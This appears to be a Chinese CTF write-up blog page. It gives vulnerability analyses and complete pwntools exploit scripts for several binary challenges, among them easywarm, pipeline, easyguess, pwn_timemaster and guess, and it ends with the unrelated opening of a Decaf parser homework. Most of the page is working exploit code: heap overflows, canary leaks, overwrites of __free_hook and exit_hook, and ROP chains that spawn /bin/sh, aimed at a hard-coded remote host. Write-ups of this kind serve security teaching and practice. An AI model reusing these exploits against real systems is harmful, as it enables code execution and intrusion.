leak_addr = u64(p.recv(6).ljust(8, '\x00'))
libc_base = leak_addr - 0xb7870
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

prepare()
add([0x0]*3) #1
exit()
challenge([("whos_your_daddy", 1228),("whos_your_daddy", 1221)])

prepare()
for i in range(9):
dele(i)
for i in range(3):
add([0x0] * 14)

edit(1, [0] * 12 + [0xdbeef010, 0xdea, 0x0])

system = libc_base + 0x50a90
add([0x6e69622f, 0x68732f] + [0x0] * 8 + [0xdeadbeef, 0x0, 0x0, 0x0, 0xbeefdead, 0x0, 0x0, 0x0, system & 0xffffffff, system >> 32])

for i in range(10):
add([0x0] * 14)
exit()

stdout = libc_base + 0xb4280
base_address = libc_base + 0xb7a90
stdout_ptr = system + 0x63920
fake_chunk = libc_base + 0xb7cc0

success("base_address >> "+hex(base_address))
success("system >> "+hex(system))
success("fake_chunk >> "+hex(fake_chunk))
success("stdout_ptr >> "+hex(stdout_ptr))
success("break_addr >> "+hex(libc_base + 0x2AB17))

maplen = 1
freeable = 1
last_value = (20 << 6) | (1 << 5) | 1 | (0xfff << 12)

challenge([("next_next", 0), ("next_next", 0),
0x0, 0x0,
fake_chunk & 0xffffffff, fake_chunk >> 32, # prev
stdout_ptr & 0xffffffff, stdout_ptr >> 32, # next
base_address & 0xffffffff, base_address >> 32, # group
0x2, 0x0, # masks
last_value & 0xffffffff, last_value >> 32])

#pause()
prepare()
dele(2)
exit()
sla(">>", "4")

p.interactive()

easywarm

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.
1
2
3
4
5
6
easywarm: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e708c2433f22dc346ad3b92573800150c429996f, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

程序总体上是实现了一个走迷宫的小游戏,漏洞比较难找

1
2
3
4
5
6
7
if ( sizeg / numg > 15 && sizeg / numg <= 32 )
{
for ( i = 0; i < sizeg / numg / 2; ++i )
v3 = 2 * v3 + 1;
v2 = v3 & (unsigned __int64)&v2;
printf("flag: %lu\n", v3 & (unsigned __int64)&v2);
}
  • 可以泄露 stack_addr 的后4位

程序设置了一个可疑的中断处理:

1
signal(8, (__sighandler_t)hander2);
1
2
3
4
memcpy(*(void **)(key_buf.argv + 8), "666", 3uLL);
memset(s, 0, 0x100uLL);
readlink("/proc/self/exe", s, 0xFFuLL);
execve(s, (char *const *)key_buf.argv, (char *const *)key_buf.env);

找了半天也没弄懂该如何触发,最后在 nowork 中发现了端倪:(有一个除0操作被优化了)

1
2
3
puts("This is a gift for you ^_^ ~");
puts("# system(\"/aidai/ash\"); exists here.");
puts("# I think you must be able to get flag.");

另外程序还有一处溢出:

1
2
memset(&key_buf, 0, sizeg / numg / 2 + 80);
readn(&key_buf, sizeg / numg / 2 + 80);
  • 在 key_buf 中可以溢出2字节

入侵思路

为了触发 stack_addr 泄露,必须先解决迷宫问题:

提取迷宫数据时往往会因为单位字符的长度不同而提取出错,这里我选择用正则表达式解决这个问题

1
2
3
4
5
6
7
8
9
maze = []
ru("\n")
for i in range(30):
data = ru("\n")[2:-2]
data = re.sub("🚩","7",data)
data = re.sub("👴","3",data)
data = re.sub(" ","1",data)
data = re.sub("██","0",data)
maze.append(data)

走迷宫的脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
def solve(v):
v = ['0' * len(v[0])] + v + ['0' * len(v[0])]
v = ['0' + i + '0' for i in v]
v = [list(i) for i in v]

x0, y0 = 0, 0
for x in range(len(v)):
for y in range(len(v[0])):
if v[x][y] == '3':
x0, y0 = x, y
v[x0][y0] = '1'

ans = []

def dfs(ans, v, x, y):
if v[x][y] == '7':
return True
if v[x][y] != '1':
return False
v[x][y] = '0'
action = [
['w', x-1, y],
['s', x+1, y],
['a', x, y-1],
['d', x, y+1],
]
for ch, xx, yy in action:
ans += [ch]
ok = dfs(ans, v, xx, yy)
if ok:
return True
ans.pop()
return False

ok = dfs(ans, v, x0, y0)
return ok, ''.join(ans)

name = "LD_DEBUG=all"
sla("name: ",name)

泄露栈地址后4字节后,配合2字节溢出覆盖 key_buf.env 低位,可以劫持环境变量到我们输入 name 的地方

看 wp 得知,设置环境变量 LD_DEBUG=all(12字节) 可以打印出 ld.so 加载库的时候的 log,因此可以得到 libc 的加载地址,效果如下:

1
2
3
4
13304:    file=./libc-2.31.so [0];  needed by ./easywarm1 [0]
13304: file=./libc-2.31.so [0]; generating link map
13304: dynamic: 0x00007ffff7fbfb80 base: 0x00007ffff7dd5000 size: 0x00000000001f14d8
13304: entry: 0x00007ffff7dfc1f0 phdr: 0x00007ffff7dd5040 phnum: 14

最后就是一个 libc 任意写,尝试打 exit_hook:

1
2
3
4
5
pwndbg> p rtld_lock_default_lock_recursive
$1 = {void (void *)} 0x7ffff7fd0150 <rtld_lock_default_lock_recursive>
pwndbg> search -t qword 0x7ffff7fd0150
Searching for value: b'P\x01\xfd\xf7\xff\x7f\x00\x00'
ld-2.31.so 0x7ffff7ffdf68 0x7ffff7fd0150

PS:从 wp 中学到的,打 __libc_atexit 也是个不错的选择

1
2
3
4
5
6
__libc_atexit:00000000001ED608                               __libc_atexit segment qword public 'DATA' use64
__libc_atexit:00000000001ED608 assume cs:__libc_atexit
__libc_atexit:00000000001ED608 ;org 1ED608h
__libc_atexit:00000000001ED608 E0 5E 09 00 00 00 00 00 off_1ED608 dq offset fcloseall_0 ; DATA XREF: sub_49930+1DA↑o
__libc_atexit:00000000001ED608 ; sub_5EED0+1672↑o
__libc_atexit:00000000001ED608 ; sub_5EED0+1E37↑o

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
# -*- coding:utf-8 -*-
from pwn import *
import re

arch = 64
challenge = './easywarm1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process([challenge,"000"])
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x180A)\n")
pause()

def cmd(op):
sla("[-]",str(op))

def add(num,size):
cmd(1)
sla(" complexity: ",str(num))
sla("length: ",str(size))

def show():
cmd(4)

def free():
cmd(5)

def challenge(data):
cmd(3)
sla("input: ",data)

def magic():
cmd(0x666)

def solve(v):
v = ['0' * len(v[0])] + v + ['0' * len(v[0])]
v = ['0' + i + '0' for i in v]
v = [list(i) for i in v]

x0, y0 = 0, 0
for x in range(len(v)):
for y in range(len(v[0])):
if v[x][y] == '3':
x0, y0 = x, y
v[x0][y0] = '1'

ans = []

def dfs(ans, v, x, y):
if v[x][y] == '7':
return True
if v[x][y] != '1':
return False
v[x][y] = '0'
action = [
['w', x-1, y],
['s', x+1, y],
['a', x, y-1],
['d', x, y+1],
]
for ch, xx, yy in action:
ans += [ch]
ok = dfs(ans, v, xx, yy)
if ok:
return True
ans.pop()
return False

ok = dfs(ans, v, x0, y0)
return ok, ''.join(ans)

name = "LD_DEBUG=all"
sla("name: ",name)

add(1,28)
show()

maze = []
ru("\n")
for i in range(30):
data = ru("\n")[2:-2]
data = re.sub("🚩","7",data)
data = re.sub("👴","3",data)
data = re.sub(" ","1",data)
data = re.sub("██","0",data)
maze.append(data)

for i in maze:
print(i)

ok,ans = solve(maze)
if len(ans)>96:
exit()
challenge(ans)

ru("flag: ")
leak_addr = eval(ru("\n"))
success("leak_addr >> "+hex(leak_addr))

add(1,32)

payload = "a"*96+p16(leak_addr+136)
challenge(payload)

magic()
ru(" dynamic: ")
leak_addr = eval(ru(" ")[:-1])*0x10
libc_base =leak_addr - 0x1eab80
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system = libc_base + libc.sym["system"]
one_gadgets = [0xe6aee,0xe6af1,0xe6af4]
one_gadget = libc_base + one_gadgets[0]
exit_hook = libc_base + 0x228f68

success("one_gadget >> "+hex(one_gadget))
success("exit_hook >> "+hex(exit_hook))

offset = exit_hook - 0xadad000
success("offset >> "+hex(offset))

#debug()

ru("Administrator mode")
sa("error?",p64(offset))
success("one_gadget >> "+hex(one_gadget))
sla("to record?",p64(one_gadget)+"a"*8)

p.interactive()

pipeline

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.
1
2
3
4
5
6
pipeline: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1660ac5f889c59866adfdd8ab506d59e2951e03a, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

程序对 size 大小有检查:(导致不能使用 mmap 进行分配)

1
2
3
chunkg = malloc(0x10uLL);
*chunkg = chunkg + 2;
chunkg[1] = 0x21000LL;
1
2
3
4
5
if ( a1 < *chunkg || (result = *chunkg + chunkg[1], a1 >= result) )
{
puts("error");
exit(0);
}

程序对 offset 也有检查:(导致 offset 不能为负数)

1
2
if ( (signed int)chunk->offset >= chunk->size || (chunk->offset & 0x80000000) != 0 )
chunk->offset = 0;

整数溢出导致堆溢出:

1
2
3
4
size2 = chunk->size - chunk->offset;
if ( size <= size2 )
LOWORD(size2) = size;
readn((__int64)chunk->data + (int)chunk->offset, (__int16)size2);
  • chunk->offset 是 unsigned int 类型,但 readn 中将其识别为 int
  • LOWORD(size2) = size 中,4字节的 size2 只有低2字节被覆盖,可能导致堆溢出
  • 如果我们输入 0x80000200(负数),程序就会进入 if 语句,但最终只有 0x200 被覆盖到 size2

入侵思路

程序没有 free,只有一个 realloc 可以利用:

1
2
3
chunk->offset = input_num("offset: ");
chunk->size = input_num("size: ");
chunk->data = realloc_s(chunk->data, chunk->size);

申请一个大堆块,然后 realloc 一个更大的堆块,配合堆风水就可以泄露 libc_base 和 heap_base

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
add()#0
add()#1
add()#2
add()#3
add()#4
add2(0,0,0x450)
add()#5
add2(1,0,0x460)
add2(0,0,0x500)
add2(2,0,0x10)

show(2)
ru("data: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ebfe0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

add2(1,0,0x500)
add2(3,0,0x430)
add2(4,0,0x40)
edit(4,0x10,"a"*0x10)

show(4)
ru("data: ")
ru("aaaaaaaaaaaaaaaa")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
heap_base = leak_addr - 0x7d0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

由于程序的限制不能直接劫持 tcache,因此需要劫持程序的单链表结构,然后直接修改 free_hook 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pipeline1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x188A)\n")
#pause()

def cmd(op):
sla(">> ",str(op))

def add():
cmd(1)

def add2(index,offset,size):
cmd(2)
sla("index: ",str(index))
if type(offset) == int:
sla("offset: ",str(offset))
else:
sla("offset: ",offset)
if type(size) == int:
sla("size: ",str(size))
else:
sla("size: ",size)

def dele(index):
cmd(3)
sla("index: ",str(index))

def edit(index,size,data):
cmd(4)
sla("index: ",str(index))
if type(size) == int:
sla("size: ",str(size))
else:
sla("size: ",size)
sla("data: ",data)

def show(index):
cmd(5)
sla("index: ",str(index))

add()#0
add()#1
add()#2
add()#3
add()#4
add2(0,0,0x450)
add()#5
add2(1,0,0x460)
add2(0,0,0x500)
add2(2,0,0x10)

show(2)
ru("data: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ebfe0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

add2(1,0,0x500)
add2(3,0,0x430)
add2(4,0,0x40)
edit(4,0x10,"a"*0x10)

show(4)
ru("data: ")
ru("aaaaaaaaaaaaaaaa")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
heap_base = leak_addr - 0x7d0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]

#debug()
add()#6
add2(6,0,0x3f0)
add2(5,0,0x100)
add()#7

payload = "a"*0x108+p64(0x21)+p64(free_hook-0x8)+p64(0x50000000000)
edit(5,"-2147483136",payload)
payload = "/bin/sh\x00" + p64(system)
edit(7,0x20,payload)

edit(0,0x10,"/bin/sh\x00")
add2(0,0,0)

p.interactive()

easyguess

1
2
3
4
5
6
easyguess: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=82ca2e649768e48e033662e11193e6e486b37089, not stripped
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
  • 32位,dynamically,NX

入侵思路

获取随机数后打栈溢出

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding:utf-8 -*-
from pwn import *
from ctypes import *

arch = 32
challenge = './easyguess'

libc = cdll.LoadLibrary("libc.so.6")

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b *0x08048594\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

def cmd(op):
sla(">",str(op))

#debug()

back_door = 0x804867A
binsh_addr = 0x8049A30
pop_edi_pop_ebp_ret = 0x080486fa

sla("You have three times",str(libc.rand()))
sl(str(libc.rand()))
sl(str(libc.rand()))

payload = "a"*24 +"b"*8 + p32(back_door) +p32(binsh_addr)
sla("to pwn it!",payload)

p.interactive()

pwn_timemaster

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/ld-2.31.so, for GNU/Linux 3.2.0, BuildID[sha1]=671697b357d39525a86658e92e5aa52b783012ff, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
  • 64位,dynamically,Canary,NX

漏洞分析

有栈溢出,需要泄露 canary:

1
2
3
4
5
6
7
8
9
10
11
_BOOL8 ask_again()
{
char v1[24]; // [rsp+0h] [rbp-20h] BYREF
unsigned __int64 canary; // [rsp+18h] [rbp-8h]

canary = __readfsqword(0x28u);
printf("Play again? (Y/n) ");
__isoc99_scanf("%s", v1); // 栈溢出
readuntil(10);
return v1[0] != 'n' && v1[0] != 'N';
}

入侵思路

1
2
printf("Time[sec]: ");
__isoc99_scanf("%lf", a1);

函数 scanf 可能会因为格式不同而写入失败,导致 time 不会被初始化

通过前面的函数可以调节栈指针,使局部变量 time 正好指向 canary:

1
chunk = alloca(0x10 * ((8 * time + 0x1E) / 0x10));

这样就会导致 canary 被泄露出来:

1
2
ask_time(&time);
printf("Stop the timer as close to %lf seconds as possible!\n", time);
  • PS:这里是以 double 类型泄露的,当时想现写一个函数用于“转义”,可能是中间的步骤写错了导致出来的数据很乱(浪费了不少时间)

后来看学弟用 struct.pack + binascii.hexlify 来处理数据,效果很好:

1
2
3
4
leak_addr = ru(" ")[:-1]
leak_addr = struct.pack("<d", float(leak_addr))
leak_addr = str(binascii.hexlify(leak_addr)[::-1])
success("leak_addr >> "+leak_addr)

最后的操作就比较朴素了,用 puts 来泄露 libc_base,写入并执行 ask_again 然后劫持返回地址为 system

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

def debug():
gdb.attach(p,"b *0x4008DB\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
#pause()

#debug()

name = "1"
times = 16
sla("What is your name?\n> ",name)
sla("How many times do you want to try?\n> ",str(times))
sla("Time[sec]: ","\x00")
p.recvuntil("Stop the timer as close to ")
leak_addr = ru(" ")[:-1]
leak_addr = struct.pack("<d", float(leak_addr))
leak_addr = str(binascii.hexlify(leak_addr)[::-1])
success("leak_addr >> "+leak_addr)

canary = ""
for i in range(0, len(leak_addr), 2):
canary += leak_addr[i+1] + leak_addr[i]
canary = eval("0x"+canary)
success("canray >> "+hex(canary))

pop_rdi_ret = 0x0000000000400e93
ret = 0x00000000004006a6

sl('\n')
payload = "a"*0x18 + p64(canary) + "b"*0x8 + p64(pop_rdi_ret) + p64(elf.got['__libc_start_main']) + p64(0x4006D0) + p64(0x40089B)
sla('Play again? (Y/n) ',payload)
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x23fc0
success("leak_addr >>" + hex(leak_addr))
success("libc_base >> " + hex(libc_base))

system = libc_base + libc.sym["system"]
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

payload = "a"*0x18+ p64(canary) + "b"*0x8 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
sla("Play again? (Y/n) ",payload)

p.interactive()

guess

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.
1
2
3
4
5
6
guess: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f21aadafb56dc99d5daac322fec33bd876bbbf3d, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

1
2
3
4
5
6
7
8
9
10
unsigned __int64 __fastcall start_routine(void *a1)
{
char buf[24]; // [rsp+0h] [rbp-20h] BYREF
unsigned __int64 v3; // [rsp+18h] [rbp-8h]

v3 = __readfsqword(0x28u);
puts("> ");
gets(buf);
return __readfsqword(0x28u) ^ v3;
}

使用了多线程,新线程的栈空间和 TLS 离得很近,可以尝试覆盖 canary

1
2
pthread_create(newthread, 0LL, (void *(*)(void *))start_routine, 0LL);
pthread_join(newthread[0], 0LL);

入侵思路

1
2
3
4
5
6
__int64 __fastcall readu(__int64 a1)
{
fflush(stdout);
__isoc99_scanf("%lu", a1);
return readr(10);
}

由于程序使用 scanf 作为输入,因此可以通过 \x00 使 scanf 输入失败,进而不会覆盖栈上的数据

1
2
3
4
5
if ( numg - 1 == indexg )
{
puts("Sorry, that was the last guess!");
printf("You entered %lu but the right number was %lu\n", input, ram);
}

然后就可以将 input 原本所占栈空间的值给泄露出来,计算偏移得到 pro_base

现在有一次栈溢出的机会,比赛时尝试了很多的方法但都失败了:

  • 不能使用 printf 泄露数据,可能是覆盖了 TLS 上的关键数据导致 printf 报错
  • 尝试万能 pop 打 csu 时发现程序使用 mov edi, r12d,导致 puts 的第一个参数写不上地址
  • 尝试回到 main start 写循环但又有莫名其妙的报错
  • 尝试执行 pthread_create 也有报错

最后发现劫持返回地址为 pro_base + 0x14D9 不会报错,并且能泄露 libc_base:

1
2
3
4
5
payload = "a"*24 + "\x00"*16 
#payload += csu(0, 1, pthread_create_got, bss_addr, 0, main_addr, csu_front_addr)
payload += p64(pop_rdi_ret)+p64(puts_got)+p64(pro_base + 0x14D9)
payload += "\x00"*0x800+"\x00"*8*8
sla("> ",payload)

最后打一个 execve("/bin/sh") 就可以了

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './guess'

context.os='linux'
#context.log_level = 'debug'

if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x1484)\n")
pause()

def cmd(op):
sla(">",str(op))

#debug()
size = 0x20-9
sla("Enter the size : ",str(size))
num = 2
sla("Enter the number of tries : ",str(num))
for i in range(2):
sla("Enter your guess :","\x00")

p.recvuntil("You entered ")
leak_addr = eval(p.recvuntil(" ").ljust(8,"\x00"))
pro_base = leak_addr - 0x1579
success("leak_addr >> "+hex(leak_addr))
success("pro_base >> "+hex(pro_base))

bss_addr = pro_base + 0x4010

pop_rdi_ret = 0x0000000000001793 + pro_base
pop_rsi_ret = 0x0000000000001791 + pro_base
pop_rbp_ret = 0x00000000000012f3 + pro_base
call_rax = 0x0000000000001014 + pro_base

csu_front_addr=0x1770+pro_base
csu_end_addr=0x178A+pro_base

print_got = 0x3F80+ pro_base
puts_got = 0x3F68 + pro_base
pthread_create_got = 0x3F60 + pro_base
main_addr = 0x15CF + pro_base

def csu(rbx, rbp, r15,r12, r13, r14, last):
# pop rbx,rbp,r12,r13,r14,r15
# rbx should be 0,
# rbp should be 1,enable not to jump
# r15 should be the function we want to call(只能是got表地址)
# rdi=edi=r12d
# rsi=r13
# rdx=r14
# csu(0, 1, fun_got, rdi, rsi, rdx, last)
payload = p64(csu_end_addr)
payload += p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
payload += p64(csu_front_addr)
payload += b'a' * 0x38
payload += p64(last)
return payload

payload = "a"*24 + "\x00"*16
#payload += csu(0, 1, pthread_create_got, bss_addr, 0, main_addr, csu_front_addr)
payload += p64(pop_rdi_ret)+p64(puts_got)+p64(pro_base + 0x14D9)
payload += "\x00"*0x800+"\x00"*8*8
sla("> ",payload)

p.recvuntil("\n")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x80970
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system = libc_base + libc.sym["system"]
binsh_addr = libc_base + next(libc.search("/bin/sh"))
pop_rdx_ret = libc_base + 0x0000000000001b96
pop_rax_ret = libc_base + 0x000000000001b500
syscall = libc_base + 0x0000000000002743

payload = "a"*24 + "\x00"*16
payload += p64(pop_rdi_ret)+p64(binsh_addr)
payload += p64(pop_rdx_ret)+p64(0)
payload += p64(pop_rsi_ret)+p64(0)+p64(0)
payload += p64(pop_rax_ret)+p64(59)
payload += p64(syscall)
sla("> ",payload)

p.interactive()

decafast

本作业的目标是为 Decaf 编程语言编写一个语法分析器

Decaf 中词汇元素的详细信息在 Decaf 规范中:Decaf Programming Language Specification

为 Decaf 语言提供解析器,以生成摘要有效 Decaf 程序的语法树

  • 抽象语法树(AST)是程序结构,无需在源代码中包含所有详细信息,它可以被认为是一个抽象的表示
  • 想要生成的抽象语法树,可以使用 Zehpyr 定义语言(这是一种用于序列化抽象语法树的方法)

实验描述

使用 Decaf 规范作为指导,完成一个 Decaf 语言的语法分析器

请务必遵守以下要求:

  • 如果程序成功解析输入,则应使用 exit(EXIT_SUCCESS) 退出程序
  • 如果您的程序在输入的无咖啡因程序中发现错误,则应使用 exit(EXIT_FAILURE) 退出
  • 程序生成的抽象语法树必须采用上面指定的格式,输出规范在 /compilers-class-hw/decafast/Decaf.asdl 中提供
  • 不要在输出中添加空格,这可能会导致将输出与参考输出匹配时出现问题

使用 Python 程序在测试用例上运行 zipout.py 解决方案程序,您的解决方案必须在目录 answer 中编译,并且必须调用 decaflex,针对所有测试用例运行,如下所示:

1
python3 zipout.py
  • 这将创建一个名为 output 的目录和一个可以根据参考输出文件进行检查的文件 output.zip
1
python3 check.py 
  • 这将检查您解决方案的准确性

实验步骤

